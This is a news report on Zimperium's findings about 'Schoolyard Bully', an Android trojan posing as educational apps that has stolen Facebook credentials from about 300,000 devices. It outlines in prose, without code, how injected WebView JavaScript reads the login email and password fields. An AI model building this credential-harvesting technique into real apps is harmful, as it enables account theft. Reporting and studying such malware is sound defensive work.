An Android malware campaign impersonating reading and education apps has been running since 2018, attempting to steal Facebook account credentials from infected devices.

According to a new report from Zimperium, the campaign has infected at least 300,000 devices in 71 countries, mostly focusing on Vietnam.

Some apps used to spread the Trojan, which Zimperium has named “Schoolyard Bully”, were previously on Google Play but have since been removed.

However, Zimperium warns that apps continue to be released through third-party Android app stores.

A schoolyard bully

The Schoolyard Bully malware gets its name from the fact that it masquerades as harmless and even beneficial educational apps.

However, the main goal of the “malware” is to steal Facebook account credentials (email and password), account ID, username, device name, device RAM and device API.

The Trojan steals these details by opening a legitimate Facebook login page in the app using WebView and injecting malicious JavaScript to extract user inputs.

“Javascript is injected into WebView using ‘evaluateJavascript’ method,” explains Zimperium.

“The javascript code extracts the value of items with ‘ids m_login_email’ and ‘m_login_password’, which are placeholders for phone number, email address and password.”

Additionally, the malware uses native libraries to hide its malicious code from security software and scanning tools.

Victims and attribution

Zimperium claims to have detected this malware on 300,000 victims in 71 countries based on their telemetry data.

Additionally, since the 37 apps associated with this campaign are distributed through third-party app stores, the number of victims is likely higher as there is no reliable way to measure the number of victims on these platforms.

Zimperium also warns that there are likely other apps besides those its researchers have discovered behind this campaign.

The threat actors behind the Schoolyard Bully Trojan are unknown, but analysts have been able to determine that the malware is not associated with the Operation FlyTrapwho also attempted to steal Facebook accounts and focused on Vietnam.